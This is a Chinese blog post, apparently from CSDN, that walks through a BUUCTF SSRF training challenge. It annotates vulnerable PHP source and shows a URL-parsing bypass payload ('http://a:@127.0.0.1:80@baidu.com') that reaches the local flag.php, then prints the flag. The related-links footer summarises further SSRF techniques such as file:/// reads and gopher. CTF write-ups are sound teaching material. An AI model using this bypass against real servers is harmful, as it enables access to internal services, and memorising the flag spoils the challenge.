从0到1CTFer成长之路-第二章-SSRF漏洞

最新推荐文章于 2024-05-21 22:07:05 发布
最新推荐文章于 2024-05-21 22:07:05 发布
阅读量737 收藏 7
点赞数 2
分类专栏: CTFer 文章标签: 从0到1CTFer成长之路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/114139117
版权

SSRF漏洞

声明

好好向大佬们学习!!!

攻击

SSRF Training

摘自

https://book.nu1l.com/tasks/#/

使用BUUCTF在线环境

https://buuoj.cn/challenges

访问

http://72b1f71b-d44d-4562-8bac-db517053ebc4.node3.buuoj.cn

在这里插入图片描述

还挺像素的,点了一圈都没用,也就intersting challenge能点,点击出现源码,其实大概一看,这里应该就是通过网页提交url获取flag的,而给出的php源码就是一些过滤条件,我们需要绕过这些过滤条件成功提交url,获取flag

在这里插入图片描述

可以看到,程序的入口是倒数后四行,通过GET传入url参数,调用safe_request_url()函数,将url传入,safe_request_url()再调用check_inner_ip(),依然是传入url

重点就是check_inner_ip()了,check_inner_ip()中,刚开始的正则好像没过滤掉什么,核心还是parse_url()函数,因为经过这个函数以后,用户传入的url参数,被分割成域名,端口。。。各个小部分,然后根据这些小部分,去进行curl访问

<?php 
highlight_file(__FILE__);//用PHP高亮显示当前的文件
function check_inner_ip($url) //获取url的域名,将域名转为ip,然后再判断这个ip是否是私有地址
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
  	//返回$url的匹配,值将是 0 次(不匹配)或 1 
    //^从开头开始匹配
   	//? 匹配0或1个正好在它之前的那个字符。注意:这个元字符不是所有的软件都支持的
    //( )标记一个子表达式的开始和结束位置。子表达式可以获取供以后使用。要匹配这些字符,请使用 \( 和 \)
    //.	匹配除换行符 \n 之外的任何单字符。要匹配 . ,请使用 \. 
    //*	匹配前面的子表达式零次或多次。要匹配 * 字符,请使用 \*
    //$:从字符串末尾进行匹配
    if (!$match_result) 
    { 
        die('url fomat error'); 
        //如果url不符合正则表达式
    } 
    try 
    { 
        $url_parse=parse_url($url); 
        //分解出一个URL的各个部
        // $url_parse是一个数组
        
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; //hostname 为主机名,也就是域名
    $ip=gethostbyname($hostname); //通过域名获取IP地址
    $int_ip=ip2long($ip); //ip2long:将IPv4的ip地址(以小数点分隔形式)转换为int
    
    //ip2long('127.0.0.0')>>24 == $int_ip>>24这里的话,我搜网上也没搜到时什么,自己推测,>>代表着右移
    //ip2long('127.0.0.0')>>24,就是把127.0.0.0的整形右移24位,IP一共32位,右移后不就剩个A段“127”了
    //$int_ip>>24,就是把经过parse_url()后的IP右移24位,如果我们输入的是127.0.0.1,有以后应该就是127
    //综上所述,这里就是一个IP白名单,不允许我们输入类似127.*.*.*、10.*.*.*、172.16.*.*、192.168.*.*
    
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
    //判断是否是私有地址,是则这个函数就返回1
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    //判断url是否是私有地址
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); //初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用
        curl_setopt($ch, CURLOPT_URL, $url); //访问的域名
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //
        curl_setopt($ch, CURLOPT_HEADER, 0); //
        //curl_setopt函数参数解释:https://www.cnblogs.com/lilyhomexl/p/6278921.html
        $output = curl_exec($ch); //抓取URL并把它传递给浏览器
        $result_info = curl_getinfo($ch); //php curl请求在curl_exec()函数执行之后,可以使用curl_getinfo()函数获取CURL请求输出的相关信息
        //[php curl curl_getinfo()返回参数详解](https://www.cnblogs.com/zqifa/p/php-curl-3.html)
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); // 关闭cURL资源,并且释放系统资源
        var_dump($output); //执行
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
}

题目的目标是让我们想办法访问到本机的flag.php,但是可以看到代码里面会进行判断,如果为私有地址就不行(代码审计中的白名单部分),所以通过parse_url()后分解出来的IP必不能为白名单内的IP,所以我们主要需要绕过parse_url()

构造payload

http://a:@127.0.0.1:80@baidu.com

进入 safe_request_url检测之后 parse_url取到的host是baidu.com

而curl取到的是127.0.0.1:80,所以就实现了检测IP时候是一个正常的一个网站域名而实际curl请求的时候是构造的127.0.0.1

<?php
$url = 'http://a:@127.0.0.1:80@baidu.com';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
?>

在这里插入图片描述

访问

http://72b1f71b-d44d-4562-8bac-db517053ebc4.node3.buuoj.cn/challenge.php?url=http://a:@127.0.0.1:80@baidu.com/flag.php

拿到flag

n1book{ug9thaevi2JoobaiLiiLah4zae6fie4r}

在这里插入图片描述

维梓-
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
104-web漏洞挖掘之SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
ctfhub SSRF ( skilltree
qq_66748496的博客
01-03 310
SSRF (Server-Side Request Forgery) 即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击,攻击者借由服务端为跳板来攻击目标系统。
CTFHub SSRF总结
iO快到碗里来
08-25 2094
内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 进入题目: 可以看到该链接可以传入一个参数url=,跟据题目描述直接构造payload:url=http://127.0.0.1/flag.php,成功得到flag。 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 进入题目: 和第一题一样,可以传入一个参数url=,首先尝试第一题的payload:url=http://127.0.0.1/flag.php 蟹bro,What’s up ??? F12看
CTFHUB技能树——SSRF(一)
最新发布
2401_82985722的博客
05-21 1223
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHub之SSRF通关
m0_52923241的博客
03-30 337
内网访问 尝试访问位于127.0.0.1的flag.php吧 直接输入http://127.0.0.1/flag.php得到flag 伪协议读取文件 尝试去读取一下Web目录下的flag.php吧 利用本地文件读取协议读取到flag 输入file:///var/www/html/flag.php,看到显示??? 此时查看源代码,找到flag 端口扫描 来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦 这里提示端口范围是8000~9000,我们利用burpsuite爆破 先输入
php curl ssrf,CTFHUB技能树-SSRF【POST请求】
weixin_36043142的博客
03-16 662
CTFHUB SSRF POST请求废话首先开始解题构造gopher数据构造获取flag的请求废话最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先我们看下题目描述,这个肯定是不能错过的。*描述:发一个HTTP POST请求.ssrf是用php的curl实现的.并且会跟踪302跳转.开始解...
第29天:WEB漏洞-CSRF及SSRF漏洞案例讲解1
08-03
1、当用户发送重要的请求时需要输入原始密码 3、检验 referer 来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章, 4、设置验证码
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载它将很快能够测试Json和XML 测试SMTP SSRF如何安装/建造git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在...
31-浅谈SSRF漏洞1
08-03
1、获取web应用可达服务器服务的banner信息以及收集内网web应用的指纹识别, 2、攻击运行在内网的系统或应用程序,获取内网各系统弱口令进行内网漫游、对有
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2182
ssrf
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1015
CTFHub技能树-web-ssrf
一道简单的SSRF
m0_56059226的博客
05-15 707
看到了一道简单的ssrf,由于说有非预期但是忘了这个知识点,所以还是记录一下 题目进去后就是一串代码 <?php highlight_file(__FILE__); //find something in flag1.php $d = $_GET['d']; $file = $_GET['ctf']; if (filter_var($d, FILTER_VALIDATE_URL)) { $r = parse_url($d); if (isset($file)) {
CTFHub-SSRF部分(已完结)
热门推荐
feng的博客
09-14 1万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
CTFHub技能树 Web-SSRF篇(保姆级通过教程)
weixin_45808483的博客
11-10 5045
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
浅谈ssrf漏洞
yggcwhat
12-13 3134
简介 SSRF(Server-Side Request Forgery)服务器端请求伪造, 是攻击者构造payload通过存在漏洞的服务器去攻击内网的其他主机或者服务器。正常都是通过外网打入内网的。 漏洞产生原理 其是有这漏洞,原理上还是在代码上,举个简单的例子: <?php if (isset($_POST['url'])) { $content = file_get_contents($_POST['url']); $filename ='./file/'; file_put_co
Web漏洞SSRF攻击汇总
小赵同学的博客
08-17 1246
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 本文转发国光师傅的手把手带你用 SSRF 打穿内网。...
CTFHUB技能树-SSRF【持续更新】
qq_33295410的博客
09-16 7009
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,发现了flag.php 3
Suricata的官方规则库emerging-all.rules有哪些ssrf的攻击检测规则呢
05-25
Suricata的官方规则库emerging-...这些规则主要用于检测Ruby on Rails框架中的SSRF漏洞,可以有效地防止攻击者利用该漏洞进行攻击。同时,Suricata还包含了其他的SSRF攻击检测规则,可以根据具体情况进行选择和配置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值